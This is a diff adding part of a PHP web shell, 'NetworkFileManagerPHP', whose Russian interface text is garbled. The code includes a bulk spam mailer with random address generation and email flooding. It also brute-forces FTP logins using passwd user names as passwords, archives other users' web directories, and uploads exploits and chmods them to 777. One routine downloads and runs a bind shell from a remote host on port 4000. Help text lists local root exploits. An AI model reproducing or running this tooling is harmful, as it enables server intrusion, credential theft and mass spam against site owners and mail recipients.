+ chdir($tm);
+ getdir();
+ readdirdata($tm);
+}
+
+# ��������� ���������� 
+function arhiv() {
+ global $tar,$tm,$pass;
+ $fullpath = $tm."/".$tar;
+
+ echo "<br>
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <tr><td> <font color='#FFFFCC' face='Tahoma' size = 2>���������� <u><b>$fullpath</b></u>  ".exec("tar -zc $fullpath -f $pass.tar.gz")."��������� � ���� <u>$pass.tar.gz</u></font></center></td></tr></table>";
+ 
+}
+
+function down($dir) {
+ global $action,$status, $tm,$PHP_SELF,$HTTP_HOST, $file3, $file2;
+ ignore_user_abort(1);
+ set_time_limit(0);
+echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+<tr><td align=center class=pagetitle><b>�������� ������</b></font></b></td></tr>
+<tr><td bgcolor=#FFFFCC><br><blockquote>��������� ���������, ��� �� �������� ��� ���������� <b>NFM</b> �� �������� <b>wget</b>, � ���� ��������� �� ��� �������, ����� ������� � ������� ������� ������� �� ������� ��������� ����� ���� �� ���� ������� � �����, ��� ����� NFM ���� ������ ����� �� �������� (��.<b>����</b>).( �������� �� �� ���� ���������)</blockquote></td></tr>
+</table>";
+
+if (!isset($status)) downfiles(); 
+
+else 
+{
+
+$data = @implode("", file($file3)); 
+$fp = @fopen($file2, "wb"); 
+@fputs($fp, $data); 
+$ok = @fclose($fp); 
+if($ok) 
+{ 
+$size = filesize($file2)/1024; 
+$sizef = sprintf("%.2f", $size);
+
+print "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>�� ���������: <b>���� <u>$file2</u> ��������</b> (".$sizef."��) </font></center></td></tr></table>"; 
+} 
+else 
+{ 
+print "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0BAACC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2><b>������ �������� �����</b></font></center></td></tr></table>"; 
+} 
+} 
+}
+
+# �������� �����
+function mailsystem() {
+ global $status,$form,$action,$name,$email,$pole,$REMOTE_ADDR,$HTTP_REFERER,$DOCUMENT_ROOT,$PATH_TRANSLATED,$HTTP_HOST;
+ 
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+<tr><td align=center class=pagetitle><b>������� � ��������� �� ������� NetworkFileManagerPHP</b></font></b></td></tr>
+<tr><td bgcolor=#FFFFCC><br>
+<blockquote>
+� �������� ������ �� �������� NFM � ��� ����� ���������� ������� � ����� ����������� �� ��������� ��� ���������� ������� � NFM, ��� ���� ����������� ����� ����������� � ����� ����������� � ���������� ������� NFM.
+</blockquote></td></tr>
+</table>";
+ 
+ if (!isset($status)) echo "$form";
+ else {
+  $email_to ="duyt@yandex.ru";
+  $subject = "NetworkFileManagerPHP  ($name)";
+  $headers = "From: $email";
+
+  $info = "---==== ��������� �� ($name)====---\n\n";
+  $info .= "Name:\t$name\n";
+  $info .= "Email:\t$email\n";
+  $info .= "What?:\n\t$pole\n\n";
+  $info .= "IP:\t$REMOTE_ADDR\n";
+  $info .= "HOST:\t$HTTP_HOST\n";
+  $info .= "URL:\t$HTTP_REFERER\n";
+  $info .= "DOC_ROOT:\t$PATH_TRANSLATED\n";
+  $send_to = "$email_to";             
+   
+  $send = mail($send_to, $subject, $info, $headers);
+  if($send == 2) echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>�������!!!���� ��������� ����������.</font></center></td></tr></table><br>";
+ }
+}
+
+function spam() {
+global $chislo, $status, $from, $otvet, $wait, $subject, $body, $file, $check_box, $domen;
+set_time_limit(0);
+ignore_user_abort(1);
+echo "<br>
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+<tr><td align=center class=pagetitle><b>���������� ������</b></font></b></td></tr>
+<tr><td bgcolor=#FFFFCC><br><blockquote> ������ ��� �� ����� �������� ���������, NFM ��� � ��������� ��������� ����� ����, ���������� ������� ����� 50-60% </blockquote></td></tr>
+</table>";
+
+ echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <form action='$PHP_SELF?action=spam' method=post>
+ <tr><td align=left valign=top colspan=4 class=pagetitle>
+ &nbsp;&nbsp;<b>��������� email:</b></td></tr>
+ <tr> <tr><td align=left valign=top colspan=4 bgcolor=#FFFFCC width=500>
+ &nbsp;&nbsp;������ ������ ������ �� ��� �����: <br>
+ &nbsp;<b>1.</b> ��������� email �� ��� ��������� ������� � ������ ��� ��������� email �� ���������� ���� ������. ����� ����������� ������������� ����� ( ������������ ������� ������������ �� ������ <u><i>10 000</i></u> )<br>
+ &nbsp;<b>2.</b> �������� ����������� ������ ��� �����</td></tr>
+ <td align=left colspan=2 class=pagetitle>&nbsp;&nbsp;<input type='checkbox' name='check_box[]'>&nbsp;&nbsp;���� <b>checked</b> �� ������ �� �������, ���� �� <b>checked</b> �� ��� �����.</td></tr>
+<tr><td align=center class=pagetitle width=200>&nbsp;&nbsp;������� email ��������:</td>
+<td align=left colspan=2>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='chislo' size=10>&nbsp;&nbsp;</td></tr>
+<tr><td align=center class=pagetitle width=200>&nbsp;C��� �����:</td>
+<td align=left width=200>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='domen[]'>&nbsp;&nbsp;</td>
+</tr>
+<tr><td width=500 align=center colspan=2><input type='submit' value='��������' class=button1 $style_button>
+</td></tr>
+ 
+ </form></table>";
+// ���������
+function s() {
+   $word="qwrtpsdfghklzxcvbnm";
+   return $word[mt_rand(0,strlen($word)-1)];
+}
+// �������
+function g() {
+   $word="eyuioa";
+   return $word[mt_rand(0,strlen($word)-2)];
+}
+// �����
+function c() {
+   $word="1234567890";
+   return $word[mt_rand(0,strlen($word)-3)];
+}
+// ��������� � ��������
+function a() {
+   $word=array('wa','sa','da','qa','ra','ta','pa','fa','ga','ha','ja','ka','la','za','xa','ca','va','ba','na','ma');
+   $ab1=count($word);
+   return $wq=$word[mt_rand(0,$ab1-1)];
+}
+
+function o() {
+   $word=array('wo','so','do','qo','ro','to','po','fo','go','ho','jo','ko','lo','zo','xo','co','vo','bo','no','mo');
+   $ab2=count($word);
+   return $wq2=$word[mt_rand(0,$ab2-1)];
+}
+function e() {
+   $word=array('we','se','de','qe','re','te','pe','fe','ge','he','je','ke','le','ze','xe','ce','ve','be','ne','me');
+   $ab3=count($word);
+   return $wq3=$word[mt_rand(0,$ab3-1)];
+}
+
+function i() {
+   $word=array('wi','si','di','qi','ri','ti','pi','fi','gi','hi','ji','ki','li','zi','xi','ci','vi','bi','ni','mi');
+   $ab4=count($word);
+   return $wq4=$word[mt_rand(0,$ab4-1)];
+}
+function u() {
+   $word=array('wu','su','du','qu','ru','tu','pu','fu','gu','hu','ju','ku','lu','zu','xu','cu','vu','bu','nu','mu');
+   $ab5=count($word);
+   return $wq5=$word[mt_rand(0,$ab5-1)];
+}
+
+function name0() {   return c().c().c().c();                    }
+function name1() {   return a().s();        }
+function name2() {   return o().s();        }
+function name3() {   return e().s();        }
+function name4() {   return i().s();        }
+function name5() {   return u().s();        }
+function name6() {   return a().s().g();        }
+function name7() {   return o().s().g();        }
+function name8() {   return e().s().g();        }
+function name9() {   return i().s().g();        }
+function name10() {   return u().s().g();        }
+function name11() {   return a().s().g().s();        }
+function name12() {   return o().s().g().s();        }
+function name13() {   return e().s().g().s();        }
+function name14() {   return i().s().g().s();        }
+function name15() {   return u().s().g().s();        }
+
+
+$cool=array(1,2,3,4,5,6,7,8,9,10,99,100,111,666,1978,1979,1980,1981,1982,1983,1984,1985,1986,1987,1988,1989,1990,1991,1992,1993,1994,1995,1996,1997,1998,1999,2000,2001,2002,2003,2004,2005);
+$domain1=array('mail.ru','hotmail.com','aol.com','yandex.ru','rambler.ru','bk.ru','pochta.ru','mail333.com','yahoo.com','lycos.com','eartlink.com');
+$d1c=count($domain1);
+
+function randword() {
+   global $cool,$cool2;
+   $func="name".mt_rand(0,15);
+   $func2="name".mt_rand(0,15);
+   switch (mt_rand(0,2)) {
+      case 0: return $func().$func2();
+      case 1: return $func().$cool[mt_rand(0,count($cool)-9)];
+	  case 2: return $func();
+      default: return $func();
+   }
+ }
+
+if (@unlink("email.txt") < 0){
+echo "�����";
+exit;
+}
+$file="email.txt"; 
+
+
+if($chislo){
+
+
+ $cnt3=mt_rand($chislo,$chislo);
+   for ($i=0; $i<$cnt3; $i++) {
+   $u=randword();
+  if(!isset($check_box)){
+  
+  if ( IsSet($_POST["domen"]) && sizeof($_POST["domen"]) > 0 )
+{
+   $domen = $_POST["domen"];
+      foreach( $domen as $k=>$v )
+   {
+       $d=$domen[mt_rand(0,$v-1)];
+   
+   }
+}
+$f=@fopen(email.".txt","a+");
+   fputs($f,"$u@$d\n");
+   }else{
+  
+   $d=$domain1[mt_rand(0,$d1c-1)];
+   $f=@fopen(email.".txt","a+");
+   fputs($f,"$u@$d\n");
+   }
+   
+  }
+   $address = $file;
+  if (@file_exists($address)) {
+    if($changefile = @fopen ($address, "r")) {
+      $success = 1;
+    } else  {
+    echo " �� ������  ���� <b>\"".$address."\"</b> !<br>";
+  }
+  
+   if ($success == 1) {
+   echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>";
+    echo "<tr><td align=center class=pagetitle width=500>  ���������� ����� <b>$chislo</b> email.</td></tr>";
+	echo "<tr><td align=center> ";
+    echo "<textarea name=\"email\" rows=\"13\" cols=\"58\" class=inputbox>";
+    while($line = @fgets($changefile,1024)) {
+      echo @trim(stripslashes($line))."\n";
+    }
+    echo"</textarea></td></tr></table>";
+	}
+	}
+if (!isset($action)){ 
+ echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <form action='$PHP_SELF?action=spam1&status=ok' method=post enctype='multipart/form-data'>
+ <tr><td align=center class=pagetitle colspan=2><b>������� ��������� �������</b></font></b></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;�� ���� ������:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='from' size=50></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;���� �����:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='otvet' size=50></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;�������� �������� (���):</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='wait' size=50></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;���� ���������:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='subject' size=50></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;����� ������:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<textarea name='body' rows='13' cols='60' class=inputbox> </textarea></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;����:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='file' name='filess' size=30></td></tr>
+<tr><td width=500 align=center colspan=2>
+<input type='submit' value='��������' class=button1 $style_button >
+<INPUT TYPE='hidden' NAME='$chislo'>
+</td></tr>
+ </form></table>";
+}
+}
+}
+function del() {
+global $PHP_SELF;
+$file_to_delete = basename("$PHP_SELF"); 
+@chmod("$file_to_delete", 0777); 
+if (@unlink("$file_to_delete") < 0){
+echo "�����";
+exit;
+}
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+<tr><td align=center class=pagetitle><b>�������� NFM</b></font></b></td></tr>
+</table>";
+}
+
+function spam1() {
+ global $status, $from, $otvet, $wait, $subject, $body, $filess, $chislo, $action;
+ set_time_limit(0);
+ignore_user_abort(1);
+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+<tr><td align=center class=pagetitle><b>�������� ����� � �������� �������</b></font></b></td></tr>
+</table>";
+
+	
+ error_reporting(63); if($from=="") { print
+"<script>history.back(-1);alert('�� ��������� ����: <�� ���� ������>')</script>";exit;}
+ error_reporting(63); if($otvet=="") { print
+"<script>history.back(-1);alert('�� ��������� ����: <���� �����>')</script>";exit;}
+ error_reporting(63); if($wait=="") { print
+"<script>history.back(-1);alert('�� ��������� ����: <�������� ��������>')</script>";exit;}
+ error_reporting(63); if($subject=="") { print
+"<script>history.back(-1);alert('�� ��������� ����: <���� ���������>')</script>";exit;}
+ error_reporting(63); if($body=="") { print
+"<script>history.back(-1);alert('�� ��������� ����: <���� ������>')</script>";exit;}
+
+  $address = "email.txt";
+  $counter = 0;
+ if (!isset($status)) echo "���-�� �� ���";
+ else {
+ echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <tr><td align=center bgcolor=#FFFFCC>��������� ���� <b>\"".$address."\"</b> ... <br></td></tr>
+";
+  if (@file_exists($address)) {
+ echo "
+  <tr><td align=center bgcolor=#FFFFCC>���� <b>\"".$address."\"</b> ������...<br></td></tr>
+";
+    if($afile = @fopen ($address, "r")) {
+ echo "
+ <tr><td align=center bgcolor=#FFFFCC>���� <b>\"".$address."\"</b> ������ ��� ������...<br></td></tr>
+";
+    } else {
+ echo "
+ <tr><td align=center class=pagetitle>���� <b>\"".$address."\"</b> �� ���� ������� ��� ������...<br></td></tr>
+";
+    }
+  } else {
+    echo "There is no file <b>\"".$address."\"</b> !<br>";
+    $status = "�� ���� ����� ����� \"".$address."\" ...";
+  }
+ echo "
+ <tr><td align=center bgcolor=#FFFFCC>�������� ������ �� ����� <b>\"".$address."\"</b> ...<br></td></tr>
+ </table>";
+  if (@file_exists($address)) {
+
+    while (!feof($afile)) {
+
+      $line = fgets($afile, 1024);
+      $line = trim($line);
+      $recipient = "";
+      $recipient = $line;
+	  
+  if ($filess) {
+	$content = fread(fopen($filess,"r"),filesize($filess));
+		$content = chunk_split(base64_encode($content));
+		$name = basename($filess);
+   } else {
+   $content ='';
+   }
+      $boundary = uniqid("NextPart_");
+	    
+	  $header    = "From: ".$from."\r\n";
+	  $header   .= "Reply-To: ".$otvet."\r\n";
+	  $header   .= "Errors-To: ".$otvet."\r\n";
+      $header   .= "X-Mailer: MSOUTLOOK / ".phpversion()."\r\n";
+	  $header .= "Content-Transfer-Encoding: 8bits\n";
+      $header .= "Content-Type: text/html; charset=\"windows-1251\"\n\n";
+	  $header .= $body;
+	  $header   .="--$boundary\nContent-type: text/html; charset=iso-8859-1\nContent-transfer-encoding: 8bit\n\n\n\n--$boundary\nContent-type: application/octet-stream; name=$filess \nContent-disposition: inline; filename=$filess \nContent-transfer-encoding: base64\n\n$content\n\n--$boundary--";
+
+		
+	  $pattern="#^[-!\#$%&\"*+\\./\d=?A-Z^_|'a-z{|}~]+";
+      $pattern.="@";
+      $pattern.="[-!\#$%&\"*+\\/\d=?A-Z^_|'a-z{|}~]+\.";
+      $pattern.="[-!\#$%&\"*+\\./\d=?A-Z^_|'a-z{|}~]+$#";
+	  
+      if($recipient != "")
+      {
+        if(preg_match($pattern,$recipient))
+        {
+          echo "
+		  <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <tr><td align=center class=pagetitle>���������� ������ �� <b>\"".$recipient."\"</b>...���������� ";
+        
+
+            if(@mail($recipient, stripslashes($subject), stripslashes($header))) {
+              $counter = $counter + 1;
+              echo "<b>[\"".$counter."\"]</b> ".date("H:i:s")."</td></tr> </table>";
+            } else {
+              echo "<tr><td align=center class=pagetitle>�� ���������� email, ��������� �� ���������� !</td></tr> </table>";
+            }
+          } else {
+              $counter = $counter + 1;
+             
+          }
+        } else {
+           echo "<br>";
+        }
+      $sec = $wait * 1000000;
+      usleep($sec);
+
+    }
+
+    if($otvet != "")
+    {
+
+      if(preg_match($pattern,$otvet))
+      {
+		echo " <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+		  <tr><td align=center class=pagetitle>���������� ������ �� <b>\"".$otvet."\"</b> ��� ��������";
+        $subject = "".$subject;
+
+        if(@mail($otvet, stripslashes($subject), stripslashes($message), stripslashes($header))) {
+          $counter = $counter + 1;
+          echo " ����������... <b>[\"".$counter."\"]</b> ".date("H:i:s")."</td></tr> </table>";
+        } else {
+          echo "<tr><td align=center class=pagetitle>�� ����������...</td></tr> </table>";
+        }
+      } else {
+          echo "<tr><td align=center class=pagetitle>������ �� ��������� email.</td></tr> </table>";
+      }
+    } else {
+    }
+
+    if(@fclose ($afile)) {
+      echo "
+	   <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+  <tr><td align=center class=pagetitle>���� <b>\"".$address."\"</b> ������� ������!<br></td></tr> </table>";
+    } else {
+      echo "
+	   <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+  <tr><td align=center class=pagetitle>���� <b>\"".$address."\"</b> �� ���� �������!<br></td></tr> </table>";    }
+  } else {
+    echo "�� ���� ��������� ����  <b>\"".$afile."\"</b> ...<br>";
+  }
+
+     $status2 ="������: ".$counter." email�� ��������.";
+    echo "<br>";
+    echo "
+	  <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+  <tr><td align=center class=pagetitle>$status2</td></tr> </table>"; 
+   
+}       
+}
+
+# ������
+function help() {
+ global $action,$REMOTE_ADDR,$HTTP_REFERER;
+ echo "<br>
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+<tr><td align=center class=pagetitle><b>�������� ������� NetworkFileManagerPHP</b></font></b></td></tr>
+<tr><td bgcolor=#FFFFCC>
+
+<blockquote><br>
+������ ������ ������� ������� ������ ��� ������������������� ������ ��������, �� � �������� ��������� 
+�� �������� �������� ������������ �� ������ �������� � ������������� ��������� ����������, 
+������� �������� ������ root, � �������� �������� ������� � ��� �������� ����������� ����������, 
+������� �������� ����� � ����� �������, ��� ��������� ����� ����������� ��� ��� ������ ��������� � �����,
+��� ����� NFM. �� ���� ������ ������ ��������� ��������� �� ����������� ����������, ������� �������� �� ���� 
+������� � �������� ��� ����������, ����������� PHP.<br><br>
+
+<b>NetworkFileManagerPHP</b> - ������ ��� ������� ������������������� ������ �����, � ����� � ��������, 
+��� ���� ���� ��������.<br><br>
+� ��������� ������� ������� ���� ������������� ��������� ��������� ����������, ��������� �������������:<br>
+- ���� ������������� ������� � ����� ���������� ������ ������ <b>(Rush)</b><br>
+- ����������� ����������, ������� ��������� ������ �� ��� ������ <b>(TerraByte)</b><br>
+- ���� � Mysql, ������� �������� �������������<br>
+- ��������� ���� ��� <b>(xoce)</b><br>
+- ������� �� ������������ ������� ����� ������ #hack.ru<br><br>
+
+<b>����������� NetworkFileManagerPHP</b><br>
+1. ����������� ������������� ����� �������� 2-�� ��������� (��������� ���� ���� �� ��� �������� �� ��������, �������� �������������� ����� fopen � cmd)<br> 
+2. ������������� �������, �� ���� ��� ������� �������, ������� ��������� � ������������ ������ (��������� ��������, ������� �� ����� �������) <br>
+3. ������������ ������� �� �������� �����, ���������� ��� �������� ����� �� ������� � �� ��������������. <br>
+4. ���� �������. ������� ������� ����������� ���� �������, �������� ������ �� ��� ������.(������ � ������������� �������� �� ����� /etc/passwd). ��� ���������� ������ ������������ � ���� � ������ ��������.<br> 
+5. ���� ���� mysql. ����������� �������� ����� ���� Mysql, ����������� �� ���� ��������. <br>
+6. ��������� bash shella. �� ����� ������ �� ������ �������� ����������� ������, ������� ��������� �� 4000 ����� ������ ����������. (��������� ��� ������� �������)<br> 
+7. ������� �������������� �������.<br> 
+8. ��������� ����������� ��������� ����� ����� �� �������� � ����������� �� ����������� �����, ������� ��������� �� 6 ��������.<br> 
+9. ����������� ������� ���� �� ���� ����� ���� ����������� �� ������� (���� ������� � ����� ������� �� ����) <br>
+10. �������� �������� �������� (jpg, jpeg,gif,png), ��� ������ �� ����� ������ �� ����� ��������, �� ������ ��� ����������� ��������!!!<br> 
+11. �������� �������� ����� (avi, mpg, mpeg), ����� �� ������ ��� ������ � ����� ��������, �� ������ �� ����������� � ���� ����� Windows Media Player!!!<br> 
+12. ��������� ���� ��������� ��������� ���������� ����� ��� ptrace, mremap, ����� � ������ �������� ��������� �������� ���������� BNC (������ ����� ��������� ����������� � ������ ��������)<br> 
+��������� ���� ��������� ���������� ������ ��������� ���) <br>
+- brk <br>
+- sendmail 8.1.*<br> 
+- mremap_pte <br>
+- r00t <br>
+- ku3 <br>
+- ex_bru <br>
+- ptrace/kmod<br> 
+- mremap2 <br>
+13. ������� ������� MD5 �� 32 ��������(������ ��� �� ����� ���������� John The Riper ����� �������, � �������� �������� PHP ������� ��� �� ���, ������ ��� ��������� ��������, �������� ���� ��� ������ �����, �� ���� ���� ��� ��������� � ���� �����, ���������� � ������ � �������������� ������� ��� � ���������� ��� ����� NFM)<br>
+14. ������ ������� � FTP � ��������� ����� � �������� ������ ( � ���� ������� ������:50 ����� ���������� �������, ��� ������� ���� � �����������, ����� ����������� � ������ �����, �� � ����� ��������� ������ ������� ��������� � �������������� ������� � ��������� ����, ������� ���������������� ���������, ������� ����� �������������� � �������)<br> 
+15. ������� ���������� ������ ���, ���������� �� ����� ��������, ��� ���� ����� �������� ��������, ���������� ����� ��� ����� 40-45% ( ������������ ���������� �������� �������� ���� )<br>
+16. ����������� ��������� ����� ���� � ������ �������� �� �������� � ������� wget ( ��� ����������� ���������� php, ������ ����� ������ �����������.... �������� �� �� ���� ��������� )<br>
+17. �������� on-line
+18. ���� ��������� - ���� email, Easy Flood � Hard Flood.
+<b>������ ������ ������������� ��������������� ��������, ��� ���� ������ ����.
+���� �������� �� ���� ������ ��������, ��� � ������ ����� �����.</b><br><br>
+<b>��� ��� �����:</b><br>
+Irc server: irc.megik.net:6667 /join #hack.ru<br>
+�������� � ����!!!<br></td></tr></table><br></blockquote>
+</td></tr>
+</table>";
+}
+
+function exploits($dir) {
+ global $action,$status, $file3,$file2,$tm,$PHP_SELF,$HTTP_HOST,$style_button, $public_site, $private_site, $private, $public, $title_ex, $title_exp;
+if (!isset($status)) upload_exploits(); 
+
+else 
+{
+
+$data = implode("", file($file3)); 
+$fp = @fopen($file2, "wb"); 
+fputs($fp, $data); 
+$ok = fclose($fp); 
+if($ok) 
+{ 
+$size = filesize($file2)/1024; 
+$sizef = sprintf("%.2f", $size);
+print "".exec("chmod 777 $public[1]")."";
+print "".exec("chmod 777 $public[2]")."";
+print "".exec("chmod 777 $public[3]")."";
+print "".exec("chmod 777 $private[1]")."";
+print "".exec("chmod 777 $private[2]")."";
+print "".exec("chmod 777 $private[3]")."";
+print "".exec("chmod 777 $private[4]")."";
+print "".exec("chmod 777 $private[5]")."";
+print "".exec("chmod 777 $private[6]")."";
+print "".exec("chmod 777 $private[7]")."";
+print "".exec("chmod 777 $private[8]")."";
+
+print "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>�� ���������: <b>���� ��������</b> (".$sizef."��) </font></center></td></tr></table>"; 
+} 
+else 
+{ 
+print "���-�� �� ���."; 
+} 
+} 
+}
+
+
+# FTP-����
+function ftp() {
+ global $action, $ftp_server, $filename, $HTTP_HOST;
+ ignore_user_abort(1);
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle>FTP-server: <b>$ftp_server</b></td></tr>";
+
+ $fpip = @fopen ($filename, "r");
+ if ($fpip) {
+  while (!feof ($fpip)) { 
+   $buf = fgets($fpip, 100);
+   ereg("^([0-9a-zA-Z]{1,})\:",$buf,$g);
+   $conn_id=ftp_connect($ftp_server);
+   if (($conn_id) && (@ftp_login($conn_id, $g[1], $g[1]))) {
+   
+   $f=@fopen($HTTP_HOST,"a+");
+   fputs($f,"$g[1]:$g[1]\n");
+     echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle><b>Connected with login:password - ".$g[1].":".$g[1]."</b></td></tr></table>";
+    
+   ftp_close($conn_id);
+   fclose($f);
+   } else {
+    echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#FFFFCC BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center>".$g[1].":".$g[1]." - <b>failed</b></td></tr></table>";
+   }
+  }
+ }
+}
+
+function tar() {
+ global $action, $filename;
+ set_time_limit(0);
+ echo "<br>
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+<tr><td align=center class=pagetitle><b>��������� ������</b></font></b></td></tr>
+<tr><td bgcolor=#FFFFCC><br><blockquote>� ����� � ���������� ����������� ��������, � �� ���� ��������� ���������������� ������ ��� ������ ������. ��� ������ ��������� ���������� ������ ���� � ����� ������ � ������ �� ����, ��� ������ ������������� � ��������� ����� �������������� � ����� tar.gz.<br><br>
+<b>��������!!!</b><br>��� ��� ���� <b>passwd</b> ����� ���� �������, �� �������� ���� ������������� ������� �������� ��������� ������������� �������.<br><br>
+<b>�������������!!!</b><br>������� ������ ����� � ��������� ����, ����� ��� ��������� �������� ���������� � ��� � ������������ ���������� ������� ��� ������������.</blockquote></td></tr>
+</table><br>";
+
+$http_public="/public_html/";
+$fpip = @fopen ($filename, "r");
+if ($fpip) {
+ while (!feof ($fpip)) { 
+  $buf = fgets($fpip, 100);
+  ereg("^([0-9a-zA-Z]{1,})\:",$buf,$g);
+  $name=$g[1];
+  echo "
+<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+<form method='get' action='$PHP_SELF' >
+<tr><td align=center colspan=2 class=pagetitle><b>��������� <u>$name.tar.gz</u>:</b></td></tr>
+<tr>
+<td valign=top><input type=text name=cm size=90 class='inputbox'value='tar -zc /home/$name$http_public -f $name.tar.gz' ></td>
+<td valign=top><input type=submit value='����' class=button1 $style_button></td>
+</tr></form></table>";
+  }
+ } 
+}
+
+
+
+# ��������� ����
+function bash() {
+ global $action, $port_bind, $pass_key;
+
+echo "<br>
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+<tr><td align=center class=pagetitle><b>��������� ����</b></font></b></td></tr>
+<tr><td bgcolor=#FFFFCC><br>������ ��� ��������������� �� 4000 ����, ������ ��� ������ �� ������ ����������</td></tr>
+</table><br>";
+
+echo "
+<TABLE CELLPADDING=0 CELLSPACING=0 width='500' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+<tr><td align=center class=pagetitle><b> ������ �� ���� �������� � ���� <u><i>s</i></u></b></td></tr>";
+
+echo "<tr><td align=center bgcolor=#FFFFCC><b>&nbsp; ".exec("wget http://vzlomanet.x25.net.ru/adm/exploits/bash/s")."</b> C��������...</td></tr>";
+echo "<tr><td align=center bgcolor=#FFFFCC><b>&nbsp; ".exec("chmod 777 s")."</b> ������������� �����...</td></tr>";
+echo "<tr><td align=center bgcolor=#FFFFCC><b>&nbsp; ".exec("./s")."</b> ���������...�� 4000 ����</td></tr>";
+# echo "<tr><td align=center bgcolor=#FFFFCC><b>&nbsp; ".exec("rm s")."</b> ������� <u>s</u>...</td></tr>";
+echo"</table>";
+
+ }
+ 
+ function flud() {
+ global $action, $check_box, $status, $emailflood, $kol, $wait, $sizeletter, $subject, $body;
+set_time_limit(0); 
+ignore_user_abort(1); 
+
+echo "<br>
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
